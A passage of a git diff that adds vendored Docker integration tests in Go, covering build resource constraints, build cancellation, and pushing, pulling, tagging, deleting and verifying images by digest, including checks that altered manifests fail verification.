FOO=bar in it - takes the last one processed. And only one entry as deduped. + c.Fatalf("Case insensitive environment variables on Windows failed. Got %s", res) + } +} + +// Test case for 29667 +func (s *DockerSuite) TestBuildWorkdirImageCmd(c *check.C) { + testRequires(c, DaemonIsLinux) + + image := "testworkdirimagecmd" + dockerfile := ` +FROM busybox +WORKDIR /foo/bar +` + out, err := buildImage(image, dockerfile, true) + c.Assert(err, checker.IsNil, check.Commentf("Output: %s", out)) + + out, _ = dockerCmd(c, "inspect", "--format", "{{ json .Config.Cmd }}", image) + c.Assert(strings.TrimSpace(out), checker.Equals, `["sh"]`) + + image = "testworkdirlabelimagecmd" + dockerfile = ` +FROM busybox +WORKDIR /foo/bar +LABEL a=b +` + out, err = buildImage(image, dockerfile, true) + c.Assert(err, checker.IsNil, check.Commentf("Output: %s", out)) + + out, _ = dockerCmd(c, "inspect", "--format", "{{ json .Config.Cmd }}", image) + c.Assert(strings.TrimSpace(out), checker.Equals, `["sh"]`) +} + +// Test case for 28902/28090 +func (s *DockerSuite) TestBuildWorkdirCmd(c *check.C) { + testRequires(c, DaemonIsLinux) + + dockerFile := ` + FROM golang:1.7-alpine + WORKDIR / + ` + _, err := buildImage("testbuildworkdircmd", dockerFile, true) + c.Assert(err, checker.IsNil) + + _, out, err := buildImageWithOut("testbuildworkdircmd", dockerFile, true) + c.Assert(err, checker.IsNil) + c.Assert(strings.Count(out, "Using cache"), checker.Equals, 1) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_build_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_build_unix_test.go new file mode 100644 index 0000000000..0205a927dd --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_build_unix_test.go @@ -0,0 +1,207 @@ +// +build !windows + +package main + +import ( + "bufio" + "bytes" + "encoding/json" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "regexp" + "strings" + "time" + + "github.com/docker/docker/pkg/integration" + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/go-units" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestBuildResourceConstraintsAreUsed(c *check.C) { + testRequires(c, cpuCfsQuota) + name := "testbuildresourceconstraints" + + ctx, err := fakeContext(` + FROM hello-world:frozen + RUN ["/hello"] + `, map[string]string{}) + c.Assert(err, checker.IsNil) + + _, _, err = dockerCmdInDir(c, ctx.Dir, "build", "--no-cache", "--rm=false", "--memory=64m", "--memory-swap=-1", "--cpuset-cpus=0", "--cpuset-mems=0", "--cpu-shares=100", "--cpu-quota=8000", "--ulimit", "nofile=42", "-t", name, ".") + if err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "ps", "-lq") + cID := strings.TrimSpace(out) + + type hostConfig struct { + Memory int64 + MemorySwap int64 + CpusetCpus string + CpusetMems string + CPUShares int64 + CPUQuota int64 + Ulimits []*units.Ulimit + } + + cfg := inspectFieldJSON(c, cID, "HostConfig") + + var c1 hostConfig + err = json.Unmarshal([]byte(cfg), &c1) + c.Assert(err, checker.IsNil, check.Commentf(cfg)) + + c.Assert(c1.Memory, checker.Equals, int64(64*1024*1024), check.Commentf("resource constraints not set properly for Memory")) + c.Assert(c1.MemorySwap, checker.Equals, int64(-1), check.Commentf("resource constraints not set properly for MemorySwap")) + c.Assert(c1.CpusetCpus, checker.Equals, "0", check.Commentf("resource constraints not set properly for CpusetCpus")) + c.Assert(c1.CpusetMems, checker.Equals, "0", check.Commentf("resource constraints not set properly for CpusetMems")) + c.Assert(c1.CPUShares, checker.Equals, int64(100), check.Commentf("resource constraints not set properly for CPUShares")) + c.Assert(c1.CPUQuota, checker.Equals, int64(8000), check.Commentf("resource constraints not set properly for CPUQuota")) + c.Assert(c1.Ulimits[0].Name, checker.Equals, "nofile", check.Commentf("resource constraints not set properly for Ulimits")) + c.Assert(c1.Ulimits[0].Hard, checker.Equals, int64(42), check.Commentf("resource constraints not set properly for Ulimits")) + + // Make sure constraints aren't saved to image + dockerCmd(c, "run", "--name=test", name) + + cfg = inspectFieldJSON(c, "test", "HostConfig") + + var c2 hostConfig + err = json.Unmarshal([]byte(cfg), &c2) + c.Assert(err, checker.IsNil, check.Commentf(cfg)) + + c.Assert(c2.Memory, check.Not(checker.Equals), int64(64*1024*1024), check.Commentf("resource leaked from build for Memory")) + c.Assert(c2.MemorySwap, check.Not(checker.Equals), int64(-1), check.Commentf("resource leaked from build for MemorySwap")) + c.Assert(c2.CpusetCpus, check.Not(checker.Equals), "0", check.Commentf("resource leaked from build for CpusetCpus")) + c.Assert(c2.CpusetMems, check.Not(checker.Equals), "0", check.Commentf("resource leaked from build for CpusetMems")) + c.Assert(c2.CPUShares, check.Not(checker.Equals), int64(100), check.Commentf("resource leaked from build for CPUShares")) + c.Assert(c2.CPUQuota, check.Not(checker.Equals), int64(8000), check.Commentf("resource leaked from build for CPUQuota")) + c.Assert(c2.Ulimits, checker.IsNil, check.Commentf("resource leaked from build for Ulimits")) +} + +func (s *DockerSuite) TestBuildAddChangeOwnership(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testbuildaddown" + + ctx := func() *FakeContext { + dockerfile := ` + FROM busybox + ADD foo /bar/ + RUN [ $(stat -c %U:%G "/bar") = 'root:root' ] + RUN [ $(stat -c %U:%G "/bar/foo") = 'root:root' ] + ` + tmpDir, err := ioutil.TempDir("", "fake-context") + c.Assert(err, check.IsNil) + testFile, err := os.Create(filepath.Join(tmpDir, "foo")) + if err != nil { + c.Fatalf("failed to create foo file: %v", err) + } + defer testFile.Close() + + chownCmd := exec.Command("chown", "daemon:daemon", "foo") + chownCmd.Dir = tmpDir + out, _, err := runCommandWithOutput(chownCmd) + if err != nil { + c.Fatal(err, out) + } + + if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil { + c.Fatalf("failed to open destination dockerfile: %v", err) + } + return fakeContextFromDir(tmpDir) + }() + + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("build failed to complete for TestBuildAddChangeOwnership: %v", err) + } +} + +// Test that an infinite sleep during a build is killed if the client disconnects. +// This test is fairly hairy because there are lots of ways to race. +// Strategy: +// * Monitor the output of docker events starting from before +// * Run a 1-year-long sleep from a docker build. +// * When docker events sees container start, close the "docker build" command +// * Wait for docker events to emit a dying event. +func (s *DockerSuite) TestBuildCancellationKillsSleep(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testbuildcancellation" + + observer, err := newEventObserver(c) + c.Assert(err, checker.IsNil) + err = observer.Start() + c.Assert(err, checker.IsNil) + defer observer.Stop() + + // (Note: one year, will never finish) + ctx, err := fakeContext("FROM busybox\nRUN sleep 31536000", nil) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + buildCmd := exec.Command(dockerBinary, "build", "-t", name, ".") + buildCmd.Dir = ctx.Dir + + stdoutBuild, err := buildCmd.StdoutPipe() + if err := buildCmd.Start(); err != nil { + c.Fatalf("failed to run build: %s", err) + } + + matchCID := regexp.MustCompile("Running in (.+)") + scanner := bufio.NewScanner(stdoutBuild) + + outputBuffer := new(bytes.Buffer) + var buildID string + for scanner.Scan() { + line := scanner.Text() + outputBuffer.WriteString(line) + outputBuffer.WriteString("\n") + if matches := matchCID.FindStringSubmatch(line); len(matches) > 0 { + buildID = matches[1] + break + } + } + + if buildID == "" { + c.Fatalf("Unable to find build container id in build output:\n%s", outputBuffer.String()) + } + + testActions := map[string]chan bool{ + "start": make(chan bool, 1), + "die": make(chan bool, 1), + } + + matcher := matchEventLine(buildID, "container", testActions) + processor := processEventMatch(testActions) + go observer.Match(matcher, processor) + + select { + case <-time.After(10 * time.Second): + observer.CheckEventError(c, buildID, "start", matcher) + case <-testActions["start"]: + // ignore, done + } + + // Send a kill to the `docker build` command. + // Causes the underlying build to be cancelled due to socket close. + if err := buildCmd.Process.Kill(); err != nil { + c.Fatalf("error killing build command: %s", err) + } + + // Get the exit status of `docker build`, check it exited because killed. + if err := buildCmd.Wait(); err != nil && !integration.IsKilled(err) { + c.Fatalf("wait failed during build run: %T %s", err, err) + } + + select { + case <-time.After(10 * time.Second): + observer.CheckEventError(c, buildID, "die", matcher) + case <-testActions["die"]: + // ignore, done + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_by_digest_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_by_digest_test.go new file mode 100644 index 0000000000..c2d85461a8 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_by_digest_test.go @@ -0,0 +1,693 @@ +package main + +import ( + "encoding/json" + "fmt" + "os" + "path/filepath" + "regexp" + "strings" + + "github.com/docker/distribution/digest" + "github.com/docker/distribution/manifest/schema1" + "github.com/docker/distribution/manifest/schema2" + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/stringutils" + "github.com/go-check/check" +) + +var ( + remoteRepoName = "dockercli/busybox-by-dgst" + repoName = fmt.Sprintf("%s/%s", privateRegistryURL, remoteRepoName) + pushDigestRegex = regexp.MustCompile("[\\S]+: digest: ([\\S]+) size: [0-9]+") + digestRegex = regexp.MustCompile("Digest: ([\\S]+)") +) + +func setupImage(c *check.C) (digest.Digest, error) { + return setupImageWithTag(c, "latest") +} + +func setupImageWithTag(c *check.C, tag string) (digest.Digest, error) { + containerName := "busyboxbydigest" + + dockerCmd(c, "run", "-e", "digest=1", "--name", containerName, "busybox") + + // tag the image to upload it to the private registry + repoAndTag := repoName + ":" + tag + out, _, err := dockerCmdWithError("commit", containerName, repoAndTag) + c.Assert(err, checker.IsNil, check.Commentf("image tagging failed: %s", out)) + + // delete the container as we don't need it any more + err = deleteContainer(containerName) + c.Assert(err, checker.IsNil) + + // push the image + out, _, err = dockerCmdWithError("push", repoAndTag) + c.Assert(err, checker.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out)) + + // delete our local repo that we previously tagged + rmiout, _, err := dockerCmdWithError("rmi", repoAndTag) + c.Assert(err, checker.IsNil, check.Commentf("error deleting images prior to real test: %s", rmiout)) + + matches := pushDigestRegex.FindStringSubmatch(out) + c.Assert(matches, checker.HasLen, 2, check.Commentf("unable to parse digest from push output: %s", out)) + pushDigest := matches[1] + + return digest.Digest(pushDigest), nil +} + +func testPullByTagDisplaysDigest(c *check.C) { + testRequires(c, DaemonIsLinux) + pushDigest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + // pull from the registry using the tag + out, _ := dockerCmd(c, "pull", repoName) + + // the pull output includes "Digest: ", so find that + matches := digestRegex.FindStringSubmatch(out) + c.Assert(matches, checker.HasLen, 2, check.Commentf("unable to parse digest from pull output: %s", out)) + pullDigest := matches[1] + + // make sure the pushed and pull digests match + c.Assert(pushDigest.String(), checker.Equals, pullDigest) +} + +func (s *DockerRegistrySuite) TestPullByTagDisplaysDigest(c *check.C) { + testPullByTagDisplaysDigest(c) +} + +func (s *DockerSchema1RegistrySuite) TestPullByTagDisplaysDigest(c *check.C) { + testPullByTagDisplaysDigest(c) +} + +func testPullByDigest(c *check.C) { + testRequires(c, DaemonIsLinux) + pushDigest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + // pull from the registry using the @ reference + imageReference := fmt.Sprintf("%s@%s", repoName, pushDigest) + out, _ := dockerCmd(c, "pull", imageReference) + + // the pull output includes "Digest: ", so find that + matches := digestRegex.FindStringSubmatch(out) + c.Assert(matches, checker.HasLen, 2, check.Commentf("unable to parse digest from pull output: %s", out)) + pullDigest := matches[1] + + // make sure the pushed and pull digests match + c.Assert(pushDigest.String(), checker.Equals, pullDigest) +} + +func (s *DockerRegistrySuite) TestPullByDigest(c *check.C) { + testPullByDigest(c) +} + +func (s *DockerSchema1RegistrySuite) TestPullByDigest(c *check.C) { + testPullByDigest(c) +} + +func testPullByDigestNoFallback(c *check.C) { + testRequires(c, DaemonIsLinux) + // pull from the registry using the @ reference + imageReference := fmt.Sprintf("%s@sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff", repoName) + out, _, err := dockerCmdWithError("pull", imageReference) + c.Assert(err, checker.NotNil, check.Commentf("expected non-zero exit status and correct error message when pulling non-existing image")) + c.Assert(out, checker.Contains, fmt.Sprintf("manifest for %s not found", imageReference), check.Commentf("expected non-zero exit status and correct error message when pulling non-existing image")) +} + +func (s *DockerRegistrySuite) TestPullByDigestNoFallback(c *check.C) { + testPullByDigestNoFallback(c) +} + +func (s *DockerSchema1RegistrySuite) TestPullByDigestNoFallback(c *check.C) { + testPullByDigestNoFallback(c) +} + +func (s *DockerRegistrySuite) TestCreateByDigest(c *check.C) { + pushDigest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + imageReference := fmt.Sprintf("%s@%s", repoName, pushDigest) + + containerName := "createByDigest" + dockerCmd(c, "create", "--name", containerName, imageReference) + + res := inspectField(c, containerName, "Config.Image") + c.Assert(res, checker.Equals, imageReference) +} + +func (s *DockerRegistrySuite) TestRunByDigest(c *check.C) { + pushDigest, err := setupImage(c) + c.Assert(err, checker.IsNil) + + imageReference := fmt.Sprintf("%s@%s", repoName, pushDigest) + + containerName := "runByDigest" + out, _ := dockerCmd(c, "run", "--name", containerName, imageReference, "sh", "-c", "echo found=$digest") + + foundRegex := regexp.MustCompile("found=([^\n]+)") + matches := foundRegex.FindStringSubmatch(out) + c.Assert(matches, checker.HasLen, 2, check.Commentf("unable to parse digest from pull output: %s", out)) + c.Assert(matches[1], checker.Equals, "1", check.Commentf("Expected %q, got %q", "1", matches[1])) + + res := inspectField(c, containerName, "Config.Image") + c.Assert(res, checker.Equals, imageReference) +} + +func (s *DockerRegistrySuite) TestRemoveImageByDigest(c *check.C) { + digest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + imageReference := fmt.Sprintf("%s@%s", repoName, digest) + + // pull from the registry using the @ reference + dockerCmd(c, "pull", imageReference) + + // make sure inspect runs ok + inspectField(c, imageReference, "Id") + + // do the delete + err = deleteImages(imageReference) + c.Assert(err, checker.IsNil, check.Commentf("unexpected error deleting image")) + + // try to inspect again - it should error this time + _, err = inspectFieldWithError(imageReference, "Id") + //unexpected nil err trying to inspect what should be a non-existent image + c.Assert(err, checker.NotNil) + c.Assert(err.Error(), checker.Contains, "No such object") +} + +func (s *DockerRegistrySuite) TestBuildByDigest(c *check.C) { + digest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + imageReference := fmt.Sprintf("%s@%s", repoName, digest) + + // pull from the registry using the @ reference + dockerCmd(c, "pull", imageReference) + + // get the image id + imageID := inspectField(c, imageReference, "Id") + + // do the build + name := "buildbydigest" + _, err = buildImage(name, fmt.Sprintf( + `FROM %s + CMD ["/bin/echo", "Hello World"]`, imageReference), + true) + c.Assert(err, checker.IsNil) + + // get the build's image id + res := inspectField(c, name, "Config.Image") + // make sure they match + c.Assert(res, checker.Equals, imageID) +} + +func (s *DockerRegistrySuite) TestTagByDigest(c *check.C) { + digest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + imageReference := fmt.Sprintf("%s@%s", repoName, digest) + + // pull from the registry using the @ reference + dockerCmd(c, "pull", imageReference) + + // tag it + tag := "tagbydigest" + dockerCmd(c, "tag", imageReference, tag) + + expectedID := inspectField(c, imageReference, "Id") + + tagID := inspectField(c, tag, "Id") + c.Assert(tagID, checker.Equals, expectedID) +} + +func (s *DockerRegistrySuite) TestListImagesWithoutDigests(c *check.C) { + digest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + imageReference := fmt.Sprintf("%s@%s", repoName, digest) + + // pull from the registry using the @ reference + dockerCmd(c, "pull", imageReference) + + out, _ := dockerCmd(c, "images") + c.Assert(out, checker.Not(checker.Contains), "DIGEST", check.Commentf("list output should not have contained DIGEST header")) +} + +func (s *DockerRegistrySuite) TestListImagesWithDigests(c *check.C) { + + // setup image1 + digest1, err := setupImageWithTag(c, "tag1") + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + imageReference1 := fmt.Sprintf("%s@%s", repoName, digest1) + c.Logf("imageReference1 = %s", imageReference1) + + // pull image1 by digest + dockerCmd(c, "pull", imageReference1) + + // list images + out, _ := dockerCmd(c, "images", "--digests") + + // make sure repo shown, tag=, digest = $digest1 + re1 := regexp.MustCompile(`\s*` + repoName + `\s*\s*` + digest1.String() + `\s`) + c.Assert(re1.MatchString(out), checker.True, check.Commentf("expected %q: %s", re1.String(), out)) + // setup image2 + digest2, err := setupImageWithTag(c, "tag2") + //error setting up image + c.Assert(err, checker.IsNil) + imageReference2 := fmt.Sprintf("%s@%s", repoName, digest2) + c.Logf("imageReference2 = %s", imageReference2) + + // pull image1 by digest + dockerCmd(c, "pull", imageReference1) + + // pull image2 by digest + dockerCmd(c, "pull", imageReference2) + + // list images + out, _ = dockerCmd(c, "images", "--digests") + + // make sure repo shown, tag=, digest = $digest1 + c.Assert(re1.MatchString(out), checker.True, check.Commentf("expected %q: %s", re1.String(), out)) + + // make sure repo shown, tag=, digest = $digest2 + re2 := regexp.MustCompile(`\s*` + repoName + `\s*\s*` + digest2.String() + `\s`) + c.Assert(re2.MatchString(out), checker.True, check.Commentf("expected %q: %s", re2.String(), out)) + + // pull tag1 + dockerCmd(c, "pull", repoName+":tag1") + + // list images + out, _ = dockerCmd(c, "images", "--digests") + + // make sure image 1 has repo, tag, AND repo, , digest + reWithDigest1 := regexp.MustCompile(`\s*` + repoName + `\s*tag1\s*` + digest1.String() + `\s`) + c.Assert(reWithDigest1.MatchString(out), checker.True, check.Commentf("expected %q: %s", reWithDigest1.String(), out)) + // make sure image 2 has repo, , digest + c.Assert(re2.MatchString(out), checker.True, check.Commentf("expected %q: %s", re2.String(), out)) + + // pull tag 2 + dockerCmd(c, "pull", repoName+":tag2") + + // list images + out, _ = dockerCmd(c, "images", "--digests") + + // make sure image 1 has repo, tag, digest + c.Assert(reWithDigest1.MatchString(out), checker.True, check.Commentf("expected %q: %s", reWithDigest1.String(), out)) + + // make sure image 2 has repo, tag, digest + reWithDigest2 := regexp.MustCompile(`\s*` + repoName + `\s*tag2\s*` + digest2.String() + `\s`) + c.Assert(reWithDigest2.MatchString(out), checker.True, check.Commentf("expected %q: %s", reWithDigest2.String(), out)) + + // list images + out, _ = dockerCmd(c, "images", "--digests") + + // make sure image 1 has repo, tag, digest + c.Assert(reWithDigest1.MatchString(out), checker.True, check.Commentf("expected %q: %s", reWithDigest1.String(), out)) + // make sure image 2 has repo, tag, digest + c.Assert(reWithDigest2.MatchString(out), checker.True, check.Commentf("expected %q: %s", reWithDigest2.String(), out)) + // make sure busybox has tag, but not digest + busyboxRe := regexp.MustCompile(`\s*busybox\s*latest\s*\s`) + c.Assert(busyboxRe.MatchString(out), checker.True, check.Commentf("expected %q: %s", busyboxRe.String(), out)) +} + +func (s *DockerRegistrySuite) TestListDanglingImagesWithDigests(c *check.C) { + // setup image1 + digest1, err := setupImageWithTag(c, "dangle1") + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + imageReference1 := fmt.Sprintf("%s@%s", repoName, digest1) + c.Logf("imageReference1 = %s", imageReference1) + + // pull image1 by digest + dockerCmd(c, "pull", imageReference1) + + // list images + out, _ := dockerCmd(c, "images", "--digests") + + // make sure repo shown, tag=, digest = $digest1 + re1 := regexp.MustCompile(`\s*` + repoName + `\s*\s*` + digest1.String() + `\s`) + c.Assert(re1.MatchString(out), checker.True, check.Commentf("expected %q: %s", re1.String(), out)) + // setup image2 + digest2, err := setupImageWithTag(c, "dangle2") + //error setting up image + c.Assert(err, checker.IsNil) + imageReference2 := fmt.Sprintf("%s@%s", repoName, digest2) + c.Logf("imageReference2 = %s", imageReference2) + + // pull image1 by digest + dockerCmd(c, "pull", imageReference1) + + // pull image2 by digest + dockerCmd(c, "pull", imageReference2) + + // list images + out, _ = dockerCmd(c, "images", "--digests", "--filter=dangling=true") + + // make sure repo shown, tag=, digest = $digest1 + c.Assert(re1.MatchString(out), checker.True, check.Commentf("expected %q: %s", re1.String(), out)) + + // make sure repo shown, tag=, digest = $digest2 + re2 := regexp.MustCompile(`\s*` + repoName + `\s*\s*` + digest2.String() + `\s`) + c.Assert(re2.MatchString(out), checker.True, check.Commentf("expected %q: %s", re2.String(), out)) + + // pull dangle1 tag + dockerCmd(c, "pull", repoName+":dangle1") + + // list images + out, _ = dockerCmd(c, "images", "--digests", "--filter=dangling=true") + + // make sure image 1 has repo, tag, AND repo, , digest + reWithDigest1 := regexp.MustCompile(`\s*` + repoName + `\s*dangle1\s*` + digest1.String() + `\s`) + c.Assert(reWithDigest1.MatchString(out), checker.False, check.Commentf("unexpected %q: %s", reWithDigest1.String(), out)) + // make sure image 2 has repo, , digest + c.Assert(re2.MatchString(out), checker.True, check.Commentf("expected %q: %s", re2.String(), out)) + + // pull dangle2 tag + dockerCmd(c, "pull", repoName+":dangle2") + + // list images, show tagged images + out, _ = dockerCmd(c, "images", "--digests") + + // make sure image 1 has repo, tag, digest + c.Assert(reWithDigest1.MatchString(out), checker.True, check.Commentf("expected %q: %s", reWithDigest1.String(), out)) + + // make sure image 2 has repo, tag, digest + reWithDigest2 := regexp.MustCompile(`\s*` + repoName + `\s*dangle2\s*` + digest2.String() + `\s`) + c.Assert(reWithDigest2.MatchString(out), checker.True, check.Commentf("expected %q: %s", reWithDigest2.String(), out)) + + // list images, no longer dangling, should not match + out, _ = dockerCmd(c, "images", "--digests", "--filter=dangling=true") + + // make sure image 1 has repo, tag, digest + c.Assert(reWithDigest1.MatchString(out), checker.False, check.Commentf("unexpected %q: %s", reWithDigest1.String(), out)) + // make sure image 2 has repo, tag, digest + c.Assert(reWithDigest2.MatchString(out), checker.False, check.Commentf("unexpected %q: %s", reWithDigest2.String(), out)) +} + +func (s *DockerRegistrySuite) TestInspectImageWithDigests(c *check.C) { + digest, err := setupImage(c) + c.Assert(err, check.IsNil, check.Commentf("error setting up image")) + + imageReference := fmt.Sprintf("%s@%s", repoName, digest) + + // pull from the registry using the @ reference + dockerCmd(c, "pull", imageReference) + + out, _ := dockerCmd(c, "inspect", imageReference) + + var imageJSON []types.ImageInspect + err = json.Unmarshal([]byte(out), &imageJSON) + c.Assert(err, checker.IsNil) + c.Assert(imageJSON, checker.HasLen, 1) + c.Assert(imageJSON[0].RepoDigests, checker.HasLen, 1) + c.Assert(stringutils.InSlice(imageJSON[0].RepoDigests, imageReference), checker.Equals, true) +} + +func (s *DockerRegistrySuite) TestPsListContainersFilterAncestorImageByDigest(c *check.C) { + digest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + imageReference := fmt.Sprintf("%s@%s", repoName, digest) + + // pull from the registry using the @ reference + dockerCmd(c, "pull", imageReference) + + // build an image from it + imageName1 := "images_ps_filter_test" + _, err = buildImage(imageName1, fmt.Sprintf( + `FROM %s + LABEL match me 1`, imageReference), true) + c.Assert(err, checker.IsNil) + + // run a container based on that + dockerCmd(c, "run", "--name=test1", imageReference, "echo", "hello") + expectedID, err := getIDByName("test1") + c.Assert(err, check.IsNil) + + // run a container based on the a descendant of that too + dockerCmd(c, "run", "--name=test2", imageName1, "echo", "hello") + expectedID1, err := getIDByName("test2") + c.Assert(err, check.IsNil) + + expectedIDs := []string{expectedID, expectedID1} + + // Invalid imageReference + out, _ := dockerCmd(c, "ps", "-a", "-q", "--no-trunc", fmt.Sprintf("--filter=ancestor=busybox@%s", digest)) + // Filter container for ancestor filter should be empty + c.Assert(strings.TrimSpace(out), checker.Equals, "") + + // Valid imageReference + out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=ancestor="+imageReference) + checkPsAncestorFilterOutput(c, out, imageReference, expectedIDs) +} + +func (s *DockerRegistrySuite) TestDeleteImageByIDOnlyPulledByDigest(c *check.C) { + pushDigest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + // pull from the registry using the @ reference + imageReference := fmt.Sprintf("%s@%s", repoName, pushDigest) + dockerCmd(c, "pull", imageReference) + // just in case... + + dockerCmd(c, "tag", imageReference, repoName+":sometag") + + imageID := inspectField(c, imageReference, "Id") + + dockerCmd(c, "rmi", imageID) + + _, err = inspectFieldWithError(imageID, "Id") + c.Assert(err, checker.NotNil, check.Commentf("image should have been deleted")) +} + +func (s *DockerRegistrySuite) TestDeleteImageWithDigestAndTag(c *check.C) { + pushDigest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + // pull from the registry using the @ reference + imageReference := fmt.Sprintf("%s@%s", repoName, pushDigest) + dockerCmd(c, "pull", imageReference) + + imageID := inspectField(c, imageReference, "Id") + + repoTag := repoName + ":sometag" + repoTag2 := repoName + ":othertag" + dockerCmd(c, "tag", imageReference, repoTag) + dockerCmd(c, "tag", imageReference, repoTag2) + + dockerCmd(c, "rmi", repoTag2) + + // rmi should have deleted only repoTag2, because there's another tag + inspectField(c, repoTag, "Id") + + dockerCmd(c, "rmi", repoTag) + + // rmi should have deleted the tag, the digest reference, and the image itself + _, err = inspectFieldWithError(imageID, "Id") + c.Assert(err, checker.NotNil, check.Commentf("image should have been deleted")) +} + +func (s *DockerRegistrySuite) TestDeleteImageWithDigestAndMultiRepoTag(c *check.C) { + pushDigest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + repo2 := fmt.Sprintf("%s/%s", repoName, "repo2") + + // pull from the registry using the @ reference + imageReference := fmt.Sprintf("%s@%s", repoName, pushDigest) + dockerCmd(c, "pull", imageReference) + + imageID := inspectField(c, imageReference, "Id") + + repoTag := repoName + ":sometag" + repoTag2 := repo2 + ":othertag" + dockerCmd(c, "tag", imageReference, repoTag) + dockerCmd(c, "tag", imageReference, repoTag2) + + dockerCmd(c, "rmi", repoTag) + + // rmi should have deleted repoTag and image reference, but left repoTag2 + inspectField(c, repoTag2, "Id") + _, err = inspectFieldWithError(imageReference, "Id") + c.Assert(err, checker.NotNil, check.Commentf("image digest reference should have been removed")) + + _, err = inspectFieldWithError(repoTag, "Id") + c.Assert(err, checker.NotNil, check.Commentf("image tag reference should have been removed")) + + dockerCmd(c, "rmi", repoTag2) + + // rmi should have deleted the tag, the digest reference, and the image itself + _, err = inspectFieldWithError(imageID, "Id") + c.Assert(err, checker.NotNil, check.Commentf("image should have been deleted")) +} + +// TestPullFailsWithAlteredManifest tests that a `docker pull` fails when +// we have modified a manifest blob and its digest cannot be verified. +// This is the schema2 version of the test. +func (s *DockerRegistrySuite) TestPullFailsWithAlteredManifest(c *check.C) { + testRequires(c, DaemonIsLinux) + manifestDigest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + // Load the target manifest blob. + manifestBlob := s.reg.readBlobContents(c, manifestDigest) + + var imgManifest schema2.Manifest + err = json.Unmarshal(manifestBlob, &imgManifest) + c.Assert(err, checker.IsNil, check.Commentf("unable to decode image manifest from blob")) + + // Change a layer in the manifest. + imgManifest.Layers[0].Digest = digest.Digest("sha256:0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef") + + // Move the existing data file aside, so that we can replace it with a + // malicious blob of data. NOTE: we defer the returned undo func. + undo := s.reg.tempMoveBlobData(c, manifestDigest) + defer undo() + + alteredManifestBlob, err := json.MarshalIndent(imgManifest, "", " ") + c.Assert(err, checker.IsNil, check.Commentf("unable to encode altered image manifest to JSON")) + + s.reg.writeBlobContents(c, manifestDigest, alteredManifestBlob) + + // Now try pulling that image by digest. We should get an error about + // digest verification for the manifest digest. + + // Pull from the registry using the @ reference. + imageReference := fmt.Sprintf("%s@%s", repoName, manifestDigest) + out, exitStatus, _ := dockerCmdWithError("pull", imageReference) + c.Assert(exitStatus, checker.Not(check.Equals), 0) + + expectedErrorMsg := fmt.Sprintf("manifest verification failed for digest %s", manifestDigest) + c.Assert(out, checker.Contains, expectedErrorMsg) +} + +// TestPullFailsWithAlteredManifest tests that a `docker pull` fails when +// we have modified a manifest blob and its digest cannot be verified. +// This is the schema1 version of the test. +func (s *DockerSchema1RegistrySuite) TestPullFailsWithAlteredManifest(c *check.C) { + testRequires(c, DaemonIsLinux) + manifestDigest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + // Load the target manifest blob. + manifestBlob := s.reg.readBlobContents(c, manifestDigest) + + var imgManifest schema1.Manifest + err = json.Unmarshal(manifestBlob, &imgManifest) + c.Assert(err, checker.IsNil, check.Commentf("unable to decode image manifest from blob")) + + // Change a layer in the manifest. + imgManifest.FSLayers[0] = schema1.FSLayer{ + BlobSum: digest.Digest("sha256:0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef"), + } + + // Move the existing data file aside, so that we can replace it with a + // malicious blob of data. NOTE: we defer the returned undo func. + undo := s.reg.tempMoveBlobData(c, manifestDigest) + defer undo() + + alteredManifestBlob, err := json.MarshalIndent(imgManifest, "", " ") + c.Assert(err, checker.IsNil, check.Commentf("unable to encode altered image manifest to JSON")) + + s.reg.writeBlobContents(c, manifestDigest, alteredManifestBlob) + + // Now try pulling that image by digest. We should get an error about + // digest verification for the manifest digest. + + // Pull from the registry using the @ reference. + imageReference := fmt.Sprintf("%s@%s", repoName, manifestDigest) + out, exitStatus, _ := dockerCmdWithError("pull", imageReference) + c.Assert(exitStatus, checker.Not(check.Equals), 0) + + expectedErrorMsg := fmt.Sprintf("image verification failed for digest %s", manifestDigest) + c.Assert(out, checker.Contains, expectedErrorMsg) +} + +// TestPullFailsWithAlteredLayer tests that a `docker pull` fails when +// we have modified a layer blob and its digest cannot be verified. +// This is the schema2 version of the test. +func (s *DockerRegistrySuite) TestPullFailsWithAlteredLayer(c 